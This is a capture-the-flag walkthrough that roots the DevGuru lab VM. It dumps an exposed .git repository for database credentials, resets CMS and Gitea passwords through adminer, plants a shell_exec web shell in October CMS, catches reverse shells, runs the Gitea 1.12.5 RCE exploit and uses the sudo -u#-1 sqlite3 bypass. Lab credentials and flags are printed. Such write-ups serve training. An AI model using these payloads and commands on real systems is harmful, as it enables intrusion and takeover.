Summary

We will get the initial shell by exploiting GIT to get the credential for the database. Then we will log in to a web application with CMS, which has code execution vulnerability.   To escalate our privilege to another user, we will get a credential for the database in a backup file. We will use that credential to change the user's password and log in to a web application that is vulnerable to AUTHENTICATED RCE. Finally, we will gain root privilege by exploiting Sudo's vulnerability and misconfiguration.

Enumeration

Nmap

Running Nmap TCP scan.

## Nmap Full Tcp scan
nmap -p- -Pn -oN nmapFullTCP.txt 192.168.79.130
Nmap scan report for 192.168.79.130
Host is up, received user-set (0.0015s latency).
Scanned at 2021-08-31 21:44:27 EDT for 2s
Not shown: 65532 closed ports
Reason: 65532 conn-refused
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
8585/tcp open  unknown syn-ack

Read data files from: /usr/bin/../share/nmap
# Nmap done at Tue Aug 31 21:44:29 2021 -- 1 IP address (1 host up) scanned in 2.37 seconds

Version enumeration of the open services

## Nmap Version enumeration with default script
nmap -sVCS -O -oN nmapVersion.txt -p22,80,8585 192.168.79.130

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
|   256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_  256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: DevGuru
| http-git: 
|   192.168.79.130:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: first commit 
|     Remotes:
|       http://devguru.local:8585/frank/devguru-website.git
|_    Project type: PHP application (guessed from .gitignore)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
8585/tcp open  unknown
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=6a1b7184bb6ff2dc; Path=/; HttpOnly
|     Set-Cookie: _csrf=P0Mgfs31k9b4oM_mEs0kULhN9Lg6MTYzMDQ2MDcyNjQxNzUyMzAzMA; Path=/; Expires=Thu, 02 Sep 2021 01:45:26 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 01 Sep 2021 01:45:26 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea 

Web Enumeration (port 80)

The landing page:

Directory fuzzing with Dirsearch

┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ dirsearch -u $ip /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50                                     
  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8914  
[22:16:36] Starting:
[22:16:38] 301 -  315B  - /.git  ->  http://192.168.79.130/.git/
[22:16:38] 200 -   13B  - /.git/COMMIT_EDITMSG
[22:16:38] 200 -   73B  - /.git/description
[22:16:38] 200 -  276B  - /.git/config     
[22:16:38] 200 -   23B  - /.git/HEAD       
[22:16:38] 200 -  240B  - /.git/info/exclude
[22:16:38] 200 -  308KB - /.git/index      
[22:16:38] 301 -  331B  - /.git/logs/refs/heads  ->  http://192.168.79.130/.git/logs/refs/heads/
[22:16:38] 200 -  158B  - /.git/logs/HEAD
[22:16:38] 200 -  158B  - /.git/logs/refs/heads/master
[22:16:38] 301 -  325B  - /.git/logs/refs  ->  http://192.168.79.130/.git/logs/refs/ 
[22:16:38] 301 -  340B  - /.git/logs/refs/remotes/origin  ->  http://192.168.79.130/.git/logs/refs/remotes/origin/
[22:16:38] 301 -  333B  - /.git/logs/refs/remotes  ->  http://192.168.79.130/.git/logs/refs/remotes/
[22:16:38] 200 -   41B  - /.git/refs/heads/master
[22:16:38] 301 -  328B  - /.git/refs/remotes  ->  http://192.168.79.130/.git/refs/remotes/
[22:16:38] 301 -  335B  - /.git/refs/remotes/origin  ->  http://192.168.79.130/.git/refs/remotes/origin/
[22:16:38] 200 -   41B  - /.git/refs/remotes/origin/master
[22:16:38] 301 -  325B  - /.git/refs/tags  ->  http://192.168.79.130/.git/refs/tags/ 
[22:16:38] 301 -  326B  - /.git/refs/heads  ->  http://192.168.79.130/.git/refs/heads/
[22:16:38] 200 -  142B  - /.git/logs/refs/remotes/origin/master
[22:16:39] 200 -  413B  - /.gitignore      
[22:16:39] 200 -    2KB - /.htaccess       
[22:16:45] 200 -   12KB - /0               
[22:16:47] 200 -   18KB - /About           
[22:16:50] 200 -    1KB - /README.md       
[22:16:56] 200 -   18KB - /about           
[22:17:04] 200 -    4KB - /adminer.php     
[22:17:11] 302 -  414B  - /backend/  ->  http://192.168.79.130/backend/backend/auth
[22:17:17] 301 -  317B  - /config  ->  http://192.168.79.130/config/
[22:17:35] 200 -   12KB - /index.php       
[22:17:44] 301 -  318B  - /modules  ->  http://192.168.79.130/modules/
[22:17:54] 301 -  318B  - /plugins  ->  http://192.168.79.130/plugins/
[22:18:02] 200 -   10KB - /services        
[22:18:02] 200 -   10KB - /services/
[22:18:06] 301 -  318B  - /storage  ->  http://192.168.79.130/storage/
[22:18:10] 301 -  317B  - /themes  ->  http://192.168.79.130/themes/

We can see that the .git directory is publicly accessible. We may be able to download all the content from the.git repository from the webserver using GitTools.

adminer.php is a login portal for the database.

While going to /backend reveals the login page for October CMS.

Web Enumeration (port 8585)

Landing page:

We will note down its version, which is 1.12.5

Directory fuzzing with Dirsearch:

┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ dirsearch -u $ip:8585 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50 -o ~/Desktop/devguru/scans/dirsearch8585.txt 
  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8914
Output File: /home/kali/Desktop/devguru/scans/dirsearch8585.txt
Error Log: /home/kali/.dirsearch/logs/errors-21-08-31_22-31-30.log
Target: http://192.168.79.130:8585/

[22:31:30] Starting: 
[22:31:36] 302 -   34B  - /admin  ->  /user/login
[22:31:36] 302 -   34B  - /admin/?/login  ->  /user/login     
[22:31:36] 302 -   34B  - /admin/  ->  /user/login           
[22:31:38] 200 -  575B  - /api/swagger         
[22:31:40] 302 -   27B  - /css  ->  /css
[22:31:40] 200 -  160B  - /debug                                    
[22:31:40] 200 -  160B  - /debug/                  
[22:31:41] 302 -   37B  - /explore  ->  /explore/repos
[22:31:41] 200 -   10KB - /explore/repos
[22:31:42] 302 -   29B  - /fonts  ->  /fonts
[22:31:42] 302 -   27B  - /img  ->  /img
[22:31:43] 302 -   34B  - /issues  ->  /user/login        
[22:31:43] 302 -   26B  - /js  ->  /js            
[22:31:44] 200 -  670B  - /manifest.json
[22:31:50] 200 -    9KB - /user/login/                   
Task Completed

Exploitation

Initial Access

We will download all the contents from the publicly available git repository.

First, dump the files using gitdumper.

┌──(imtodess㉿deathnote)-[~/tools/GitTools/Dumper]
└─$ ./gitdumper.sh http://devguru.local/.git/ website/  
###########
# GitDumper is part of https://github.com/internetwache/GitTools            
#
# Developed and maintained by @gehaxelt from @internetwache           
#                  
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########    

The use extractor to get the missing files.

┌──(imtodess㉿deathnote)-[~/tools/GitTools/Extractor]
└─$ ./extractor.sh ~/Desktop/devguru/loot/website ~/Desktop/devguru/loot/ExtractedWeb
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########

Going through the contents we extracted, we find a file name database.php

┌──(imtodess㉿deathnote)-[~/…/loot/ExtractedWeb/0-7de9115700c5656c670b34987c6fbffd39d90cf2/config]
└─$ ls
app.php           cache.php   database.php     mail.php      session.php
auth.php          cms.php     environment.php  queue.php     view.php
broadcasting.php  cookie.php  filesystems.php  services.php

Look at the content of database.php

        'mysql' => [
            'driver'     => 'mysql',
            'engine'     => 'InnoDB',
            'host'       => 'localhost',
            'port'       => 3306,
            'database'   => 'octoberdb',
            'username'   => 'october',
            'password'   => 'SQ66EBYx4GT3byXH',
            'charset'    => 'utf8mb4',
            'collation'  => 'utf8mb4_unicode_ci',
            'prefix'     => '',
            'varcharmax' => 191,
        ],   

We get the credential for the database. Go to adminer.php and log in with the creds we found.

Once logged in, we find the Database entry on backend users.

Since we can edit the data. We will change the password. To do that, first, generate a brcypt hash of the password you want to use.

https://bcrypt-generator.com/

Then replace the hash of the old password with your newly generated one.

We will log in to CMS, which is on /backend with the username frank and the password we replaced.

With a little bit of googling around, we find that we can execute PHP code on it.

We will add a new page name shell. Then at the code tab, add the following code.

function onStart(){
    $this->page["myVar"] = shell_exec($_GET['cmd']);
    
}

And add the following on Markup, and we are ready to go.

{{ this.page.myVar }}

Confirm the code execution by going to /shell?cmd={command of your choice}

Confirming Code Execution

Since we can run any command on the server, we will upload our malicious PHP file, which will give us the reverse shell. Get the PHP file from here.

💡
Don't forget to edit the file and replace the IP and port accordingly.

Start the HTTP server on your machine in a directory with the PHP file.

┌──(imtodess㉿deathnote)-[~/oscp/exploits]
└─$ ls
shell.php  
  
┌──(imtodess㉿deathnote)-[~/oscp/exploits]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Now, download the file to the target machine using the following command.

Check if it is downloaded successfully.

Start a Netcat listener which you specified in the PHP file.

┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ nc -nvlp 8585 
listening on [any] 8585 ...

Execute the PHP file.

We get the reverse shell and have initial access to the target machine.

┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ nc -nvlp 8585
listening on [any] 8585 ...
connect to [192.168.79.129] from (UNKNOWN) [192.168.79.130] 46030
Linux devguru.local 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 23:36:27 up  2:12,  0 users,  load average: 0.04, 0.04, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation (to another user)

Going through the files in the system. We will find a backup file with credentials for gitea.

www-data@devguru:/var$ cd backups/
www-data@devguru:/var/backups$ ls
app.ini.bak  apt.extended_states.0  apt.extended_states.1.gz 
www-data@devguru:/var/backups$ cat app.ini.bak 
. . .
; Database to use. Either "mysql", "postgres", "mssql" or "sqlite3".
DB_TYPE             = mysql
HOST                = 127.0.0.1:3306
NAME                = gitea
USER                = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD              = UfFPTF8C8jjxVF2m
. . .

We will do the same thing we did earlier. just login into /adminer.php and change the password of the user.

Now login to gitea at port 8585.

Look for the known exploits of gitea using searcsploit.

┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ searchsploit gitea 1.12                                                                
 Exploit Title                                  |  Path
------------------------------------------------ 
Gitea 1.12.5 - Remote Code Execution (Authentic | multiple/webapps/49571.py
------------------------------------------------                                                                      
Shellcodes: No Results                                                                                                                                                                                                           

There is one Authenticated (RCE) . Since we already have the credential, let's use this exploit. Copy the exploit to your working directory.

┌──(imtodess㉿deathnote)-[~/Desktop/devguru/scans]
└─$ cd ../exploit            

┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]
└─$ searchsploit -m multiple/webapps/49571.py
  Exploit: Gitea 1.12.5 - Remote Code Execution (Authenticated)
      URL: https://www.exploit-db.com/exploits/49571
     Path: /usr/share/exploitdb/exploits/multiple/webapps/49571.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/kali/Desktop/devguru/exploit/49571.py 

Start another Netcat listener.

┌──(imtodess㉿deathnote)-[~]        
└─$ nc -nvlp 8585
listening on [any] 8585 ...  

Execute the exploit.

┌──(imtodess㉿deathnote)-[~/Desktop/devguru/exploit]                                                                                                                    
└─$ python3 49571.py -v -t http://192.168.79.130:8585 -u frank -p imtodess -I 192.168.79.129 -P 8585                                                                    
    _____ _ _______                                                                 
   / ____(_)__   __|             CVE-2020-14144
  | |  __ _   | | ___  __ _                                                         
  | | |_ | |  | |/ _ \/ _` |     Authenticated Remote Code Execution         
  | |__| | |  | |  __/ (_| |
   \_____|_|  |_|\___|\__,_|     GiTea versions >= 1.1.0 to <= 1.12.5
                                                                                    
[+] Starting exploit ...                                                            
   [>] login('frank', ...)     
   [>] Deleting repository : vuln
   [>] Creating repository : vuln
   [>] repo_set_githook_post_receive('vuln')
   [>] logout()
Initialized empty Git repository in /tmp/tmp.XLsXCQ6oLY/.git/
[master (root-commit) abec032] Initial commit
 1 file changed, 1 insertion(+)
 create mode 100644 README.md
Enumerating objects: 3, done.
Counting objects: 100% (3/3), done.
Writing objects: 100% (3/3), 249 bytes | 249.00 KiB/s, done.
   [>] Deleting repository : vuln
[+] Exploit completed !

We now have access to the machine as user frank.

┌──(imtodess㉿deathnote)-[~]    
└─$ nc -nvlp 8585
listening on [any] 8585 ...
connect to [192.168.79.129] from (UNKNOWN) [192.168.79.130] 44816
bash: cannot set terminal process group (658): Inappropriate ioctl for device
bash: no job control in this shell
frank@devguru:~/gitea-repositories/frank/vuln.git$ cd
frank@devguru:~$ ls
gitea-repositories

Privilege Escalation (to root)

Check for sudo privileges

frank@devguru:~$ sudo -l
sudo -l
Matching Defaults entries for frank on devguru:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User frank may run the following commands on devguru:
    (ALL, !root) NOPASSWD: /usr/bin/sqlite3

We can run sqlite3 without a password, but the user frank can't run it as root.

Check the version of sudo.

frank@devguru:~$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2 

This version of sudo is vulnerable to security bypass. Refer to this for more info.

We will use this security bypass to execute sqlite3 as root to escalate our privilege to that of root. Refer to this regarding the sqlite3 privilege escalation.

frank@devguru:~$ sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'
root@devguru:~# cd /root
root@devguru:/root# ls
msg.txt  root.txt
root@devguru:/root# cat root.txt
96440606fb88aa7497cde5a8e68daf8f
root@devguru:/root# cat msg.txt            
           Congrats on rooting DevGuru!            
  Contact me via Twitter @zayotic to give feedback!    

root@devguru:/root# cat /home/frank/user.txt
22854d0aec6ba776f9d35bf7b0e00217